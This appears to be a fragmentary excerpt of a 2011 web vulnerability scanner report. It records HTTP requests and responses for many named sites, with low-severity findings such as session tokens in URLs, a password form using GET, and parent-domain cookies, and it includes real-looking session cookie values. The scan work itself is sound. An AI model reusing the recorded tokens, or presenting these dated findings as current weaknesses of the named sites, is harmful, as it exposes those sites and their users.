GET /cdas187/d/a/p18485/serv.do HTTP/1.1 Host: areaclienti187.telecomitalia.it Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Mon, 02 May 2011 22:23:24 GMT Server: Apache Cache-Control: no-cache="set-cookie" Content-Length: 2923 Set-Cookie: JSESSIONID_187CDAS=h72QN1ncLn59VV1nLzn2G6CN3GxcTPPH5rL1zPy022ctxnzFxMnC!-1329674579; path=/cdas187 X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding, User-Agent
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" style="overflow:hidden;" ...[SNIP]...
Request
GET /cdas187/d/a/p21608/serv2.do HTTP/1.1 Host: areaclienti187.telecomitalia.it Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Mon, 02 May 2011 22:23:30 GMT Server: Apache Cache-Control: no-cache="set-cookie" Content-Length: 2923 Set-Cookie: JSESSIONID_187CDAS=zn7KN1nCQT9GwTtRG9hmSm5nLcMP5Qtv5dTLTh3yhfPQKJRJ6TTK!6541692; path=/cdas187 X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding, User-Agent
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" style="overflow:hidden;" ...[SNIP]...
Request
GET /cdas187/d/a/p21618/serv3.do HTTP/1.1 Host: areaclienti187.telecomitalia.it Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Mon, 02 May 2011 22:23:31 GMT Server: Apache Cache-Control: no-cache="set-cookie" Content-Length: 2923 Set-Cookie: JSESSIONID_187CDAS=4894N1nDrQnTjgkyyxpjy5R22JChxQr3lZXQCDMq1pt2gwVLcG3W!-1852540237; path=/cdas187 X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding, User-Agent
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" style="overflow:hidden;" ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /default.asp HTTP/1.1 Host: eprocurement.eni.it Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Helm : The Web Hosting Control System</title> <link rel="icon" href="/favicon.ico" type="image/x-icon" /> <lin ...[SNIP]...
HTTP/1.0 200 OK Date: Mon, 02 May 2011 21:30:41 GMT Last-Modified: Mon, 02 May 2011 21:30:41 GMT Set-Cookie: MIAMISESSION=4d1567b8-7503-11e0-b300-00008a0c593d:3481824641; path=/; domain=.sciencedirect.com; HttpOnly; Content-Type: text/html Expires: Tue, 01 Jan 1980 04:00:00 GMT X-RE-Ref: 0 -1136083128 Server: www.sciencedirect.com 9999 138.12.6.33:443 P3P: CP="IDC DSP LAW ADM DEV TAI PSA PSD IVA IVD CON HIS TEL OUR DEL SAM OTR IND OTC"
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "_http://www.w3.org/TR/html4/loose.dtd" > <html> <head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <!-- TRA ...[SNIP]...
WsId=130438129946916680041160.75183102876704720416; Expires=Wed, 02 May 2012 00:08:18 GMT; Path=/
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /webankpub/wb/2l/do/aol/wbwsPUaol0.do?tabId=nav_pub_wb_conti_nw&OBS_KEY=pro_wbn_apri_conto_webank HTTP/1.1 Host: www.webank.it Connection: keep-alive Referer: http://www.webank.it/lndpage/promo321.html User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /default.aspx HTTP/1.1 Host: feedback.live.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Mon, 02 May 2011 22:24:25 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: MSIDCookie=5a1b6f4a-11e7-4f95-b279-8f8c261c145c; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/ Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 15547
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en-us" xml:lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><hea ...[SNIP]...
11. Session token in URL
There are 8 instances of this issue:
Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.
Issue remediation
The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.
GET /news/Articoli/2011/04/bertolino-Consumer-Retention-Management-aprile-2011.php HTTP/1.1 Host: job24.ilsole24ore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 02 May 2011 22:29:33 GMT Server: Apache/2.0.46 (CentOS) Accept-Ranges: bytes X-Powered-By: PHP/4.3.2 Connection: close Content-Type: text/html; charset=ISO8859-1 Content-Length: 33489
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
GET /docs/gated/campaigns/bpm_search3.htm HTTP/1.1 Host: web.progress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.progress.com/SmCreateCookie.ccc?SMSESSION=QUERY&PERSIST=0&TARGET=-SM-HTTP%3a%2f%2fweb%2eprogress%2ecom%2fam%2fsec%2fprocessRequest%3ftargetUrl%3d%2fdocs%2fgated%2fcampaigns%2fbpm_search3%2ehtm%3f">here</a> ...[SNIP]...
GET /s/article/9214732/Semantic_Web_Tools_you_can_use HTTP/1.1 Host: www.computerworld.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache/2.2.3 (CentOS) Content-Language: en Content-Type: text/html; charset=UTF-8 Eirxpes: Mon, 02 May 2011 22:33:54 GMT Cneonction: close chCae-Control: private ETag: "KXAOEEJGPLSUQMTSV" Cache-Control: public, max-age=226 Expires: Mon, 02 May 2011 22:33:41 GMT Date: Mon, 02 May 2011 22:29:55 GMT Connection: close Connection: Transfer-Encoding Content-Length: 133043
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <script type="text/javascri ...[SNIP]... </script> <script type="text/javascript" src="http://api.demandbase.com/api/v1/ip.json?token=4aa25eb10e6f9884a91e9805c3fcb58ec1cd8407&callback=dbase_parse"></script> ...[SNIP]...
SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.
It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.
13. Password field submitted using GET method
Summary
Severity:
Low
Confidence:
Certain
Host:
http://digg.com
Path:
/submit
Issue detail
The page contains a form with the following action URL, which is submitted using the GET method:
http://digg.com/submit
The form contains the following password field:
password
Issue background
The application uses the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passwords into the URL increases the risk that they will be captured by an attacker.
Issue remediation
All forms submitting passwords should use the POST method. To achieve this, you should specify the method attribute of the FORM tag as method="POST". It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.
Request
GET /submit HTTP/1.1 Host: digg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.
Issue remediation
By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /pix.aspx?atok=zx2-2183-it&eventtype=3&aid=200&mode=html&ver=2.5&ref=&r=0.9961211793124676 HTTP/1.1 Host: rainbow.mythings.com Proxy-Connection: keep-alive Referer: http://www.telecomitalia.it/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Date: Mon, 02 May 2011 22:16:02 GMT Expires: -1 P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Pragma: no-cache Server: Microsoft-IIS/6.0 Set-Cookie: uip=173U193U214U243; domain=.mythings.com; path=/ Set-Cookie: mt_zx2-2183-it=02|QwAAAB+LCAAAAAAABADsvQdgHEmWJSYvbcp7f0r1StfgdKEIgGATJNiQQBDswYjN5pLsHWlHIymrKoHKZVZlXWYWQMztnbz33nvvvffee++997o7nU4n99//P1xmZAFs9s5K2smeIYCqyB8/fnwfPyJ+cXZ+/uh73x8tsuLRR3s7Ox+NmotH3/vFefvo3sh+1DaPPtrd3bm/s7e3t/vpzt5Ho+mj3VEzpxd/yfd/yf8TAAD//5lh16VDAAAA; domain=.mythings.com; expires=Fri, 01-Jul-2011 22:16:02 GMT; path=/ Set-Cookie: cksession=424bced9-3349-491e-b41d-abd485764b45; domain=.mythings.com; path=/ Set-Cookie: ckid=e983b326-a4f8-4e01-aae3-4bac13918ccc; domain=.mythings.com; expires=Sun, 02-May-2021 22:16:02 GMT; path=/ Set-Cookie: uip=173U193U214U243; domain=.mythings.com; path=/ Set-Cookie: uip=173U193U214U243; domain=.mythings.com; path=/ Set-Cookie: mttgt={ts:"110502221602",cmp:[]}; domain=.mythings.com; expires=Fri, 01-Jul-2011 22:16:02 GMT; path=/ Set-Cookie: uip=173U193U214U243; domain=.mythings.com; path=/ X-AspNet-Version: 4.0.30319 x-machine-name: Rainbow-28 (i-00667d77) X-Powered-By: ASP.NET Content-Length: 3147 Connection: keep-alive
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <title></title>
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.capterra.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /science/journal/09574174 HTTP/1.1 Host: www.sciencedirect.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.0 200 OK Date: Mon, 02 May 2011 21:30:11 GMT Last-Modified: Mon, 02 May 2011 21:30:11 GMT Set-Cookie: EUID=5c90559a-7503-11e0-a9ef-00008a0c593e; expires=Sunday, 27 Apr 2031 21:30:11 GMT; path=/; domain=.sciencedirect.com; HttpOnly; Set-Cookie: MIAMISESSION=5c8fd124-7503-11e0-a9ef-00008a0c593e:3481824611; path=/; domain=.sciencedirect.com; HttpOnly; Set-Cookie: TARGET_URL=fcf74dd786744d87fbaaaf8652a764ab4a79b0d3ed681139e910692376063105b57efc9f763ef87b0f182b22962ff5424f96d9e5b6030b75; path=/; domain=.sciencedirect.com; HttpOnly; Set-Cookie: MIAMIAUTH=...[SNIP]...; path=/; domain=.sciencedirect.com; HttpOnly; Set-Cookie: MIAMIAUTH=...[SNIP]...; path=/; domain=.sciencedirect.com; HttpOnly; Content-Type: text/html Expires: Tue, 01 Jan 1980 04:00:00 GMT X-RE-Ref: 0 -1162923096 Server: www.sciencedirect.com 9999 138.12.6.53:80 P3P: CP="IDC DSP LAW ADM DEV TAI PSA PSD IVA IVD CON HIS TEL OUR DEL SAM OTR IND OTC"
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "_http://www.w3.org/TR/html4/loose.dtd" > <html> <head>
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /scripts/services/dynamicsGalleryService.asp?idCollection=3615&nax=2 HTTP/1.1 Host: www.yoox.com Proxy-Connection: keep-alive Referer: http://www.yoox.com/_partners/luxury24/slide_luxury_moda_210x195.swf Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /h.click/aomOnIT6rp3GUVXUFITPip26BbRmjE4WYr1HrLpdZau5mvS3sM6UsvbWGrePPUmTHMQUrMX5resVqMvVEFdPTvIRcFZdQbuxSt79UVnT4r6nodan0EPp3HjESGjG56JZbpdEoTdZbhXbrjYb7f1TAtPbBDTrM4VHU4nF7vRUrFfZcnUYu/ HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=...[SNIP]...;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Mon, 02 May 2011 22:46:04 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Mon, 02 May 2011 22:46:04 GMT P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Date: Mon, 02 May 2011 22:31:04 GMT Expires: Mon, 02 May 2011 22:31:04 GMT Cache-Control: private Content-Length: 5973
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon May 02 04:27:54 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]...
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Tue, 03 May 2011 00:09:10 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Tue, 03 May 2011 00:09:10 GMT P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Date: Mon, 02 May 2011 23:54:10 GMT Expires: Mon, 02 May 2011 23:54:10 GMT Cache-Control: private Content-Length: 244
cProfile=AQJfZZOPcggJAAAAAAAPAAABMAAJK7kAB2RlZmF1bHQ=; path=/; domain=neodatagroup.com; expires=Wed, 18 May 2011 00:17:39 GMT
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ad/tiscaliadv.jsp?loc=ans_ans_hom_304x450_d&l3d=http://ad.it.doubleclick.net/click%3Bh%3Dv8/3afb/3/0/%2a/d%3B223125489%3B0-0%3B1%3B22822695%3B31939-304/450%3B35898920/35916798/1%3B%3B%7Eaopt%3D2/1/4/0%3B%7Esscs%3D%3f&bt=a&wt=n&rnd=281253354039 HTTP/1.1 Host: ad78.neodatagroup.com Proxy-Connection: keep-alive Referer: http://www.ansa.it/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Mon, 02 May 2011 22:17:39 GMT P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"; policyref="/ad/w3c/p3p.xml" Set-Cookie: cP=AQkCX2WTj3IICQAAAAABS7g6AP///50AAQAAAgAEtzwAAQAAA3VzLS0tLQAA; path=/; domain=neodatagroup.com; expires=Fri, 30-Apr-2021 00:17:39 GMT Set-Cookie: cS=AQIABLc8AAEAAAcAAE9ZAAEAAA==; path=/; domain=neodatagroup.com; Set-Cookie: cProfile=AQJfZZOPcggJAAAAAAAPAAABMAAJK7kAB2RlZmF1bHQ=; path=/; domain=neodatagroup.com; expires=Wed, 18 May 2011 00:17:39 GMT Content-Type: text/html;charset=ISO-8859-1 Content-Length: 758 Cache-Control: max-age=0 Expires: Mon, 02 May 2011 22:17:39 GMT Connection: close
var adCUrl='http://adlev.neodatagroup.com/ad/clk.jsp?x=179706.157501.1063.309052.-1.-1.9.78.1.1230.1.-1.-1.-1..-1.16..4.%26link=http%3A%2F%2Fclk.tradedoubler.com%2Fclick%3Fp%3D205518%26a%3D1527836%26g ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /4/www.ilsole24ore.it/10/_01_000_/_homepage/1661065426@BackGround,Top,VideoBox,VideoBox_2,VideoBox_3,MaxTicker_01,MaxTicker_02,StripMenu_01,Right3,SpotLight_01,SpotLight_02,SpotLight_03,TextBox_01,TextBox_02,TextBox_03,TextBox_04,TextBox_05,TextBox_06,LittleBox_01,LittleBox_02,LittleBox_03,PopUp,PopUnder? HTTP/1.1 Host: adv.ilsole24ore.it Proxy-Connection: keep-alive Referer: http://www.ilsole24ore.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Mon, 02 May 2011 22:13:39 GMT Server: Apache/1.3.37 (Unix) mod_cap/1.2.3 mod_oas/5.8 Set-Cookie: RMID=adc1d6f34dbf2c90; expires=Fri, 31-Dec-2020 23:59:59 GMT; path=/; domain=.ilsole24ore.it P3P: policyref="http://adv.ilsole24ore.it/w3c/p3p.xml", CP="NOI DEVa TAIa OUR BUS UNI" Content-Length: 37380 Expires: Tue, 25 Apr 1995 09:30:27 -0700 Pragma: no-cache Connection: close Content-Type: application/x-javascript
function OAS_RICH(position) { if (position == 'BackGround') { document.write ('<A HREF="http://adv.ilsole24ore.it/5c/www.ilsole24ore.it/10/_01_000_/_homepage/1266591715/BackGround/OasDefault/default/e ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <HTML><HEAD> <TITLE>302 Found</TITLE> </HEAD><BODY> <H1>Found</H1> The document has moved <A HREF="http://www.webank.it/lndpage/promo321.html">here</ ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /RealMedia/ads/click_lx.ads/www.ilsole24ore.it/10/_01_000_/_homepage/2007468888/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere565255656065156.html/61646331643666333464626632633930 HTTP/1.1 Host: adv.ilsole24ore.it Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: RMFL=011QH1NVU1088N; RMID=adc1d6f34dbf2c90; RMFD=011QH1NKO10CUN;
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <HTML><HEAD> <TITLE>302 Found</TITLE> </HEAD><BODY> <H1>Found</H1> The document has moved <A HREF="http://www.stile-magazine.it">here</A>.<P> <HR> <A ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /question/index HTTP/1.1 Host: answers.yahoo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Mon, 02 May 2011 22:23:12 GMT Set-Cookie: B=5sbapqt6rubmg&b=3&s=f4; expires=Tue, 02-May-2013 20:00:00 GMT; path=/; domain=.yahoo.com P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" Status: 404 Not Found Imagetoolbar: Set-Cookie: answers=SmhGfTfoOQ0db.8ef0vD2MzHIRDUJi5bCY5ng3si3sBcAcCR4N72Pka1dVM2fcTrURXaSQYY2_mqK8uzpRHwf9wPbtuRYlbhorqJHtpY2GKqq.JsOSGpmveDCpUBh22NekdTb4.cmnPTfArTQUtT07zHPK_iVLSXlvnJbBt6ti1cTQIQlPFAI_bPyYeDaLWdmUHgXpNxWiIe46.buzxw7UQd5xq8H6dOqfL6ipn42XhIN1GeHTcHUzKQV.U_fRrPr55OCJ.J7Bxj2CERgjpSSffDzPPFlCBJqDJdNxsbpZKA_6AQnjW_woyyiObtdzgEKGzlwreqRQTbIxmyF_NzaHvwbf75KWnggrA48ra6cEeQaePU71NHfUw3d4hFiGzlsgQ7d9vY8aWxBVrogLo9OHQSLvBDpNxTJ4E8Pfsui6MJMPPZhZ_f7X6_Sy3GDbWnwEaO4aHqcCPApAa32_FMh7BKzsioUMzDf_u9cdhNDWdImio6wGJ9KDo-; expires=Wed, 02-May-2012 22:23:12 GMT; path=/; domain=.answers.yahoo.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Cache-Control: private Content-Length: 31141
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-us" dir="ltr"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" ...[SNIP]...
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
slat=1304375040; domain=.alice.it; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /aap/serviceforwarder HTTP/1.1 Host: auth.rossoalice.alice.it Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Date: Mon, 02 May 2011 22:23:33 GMT Server: Apache Location: http://maileservizi.alice.it/home/login.html Set-Cookie: slat=1304375040; domain=.alice.it; path=/ Connection: close Content-Type: text/html Content-Length: 283
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="http://maileservizi.alice.it/home/ ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /cm/tr/17671-124835-21707-7?mpt=1304392432100 HTTP/1.1 Host: cdn4.eyewonder.com Proxy-Connection: keep-alive Referer: http://www.ilsole24ore.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: no-store Pragma: no-cache Expires: 0 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV" Set-Cookie: svid=68257899343; expires=Fri, 2-May-2014 5:23:04 GMT; path=/; domain=.eyewonder.com; Set-Cookie: mojo3=17671:21707; expires=Thu, 2-May-2013 5:23:04 GMT; path=/; domain=.eyewonder.com; Content-Type: image/gif Content-Length: 49 Date: Mon, 02 May 2011 22:16:38 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /post HTTP/1.1 Host: del.icio.us Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Date: Mon, 02 May 2011 22:24:02 GMT Set-Cookie: BX=269mihl6rubo2&b=3&s=pq; expires=Tue, 02-May-2013 20:00:00 GMT; path=/; domain=.icio.us P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" Location: http://www.delicious.com/post Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Cache-Control: private Content-Length: 162
The document has moved <A HREF="http://www.delicious.com/post">here</A>.<P> <!-- fe09.web.del.ac4.yahoo.net uncompressed/chunked Mon May 2 22:24:02 UTC 2011 -->
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
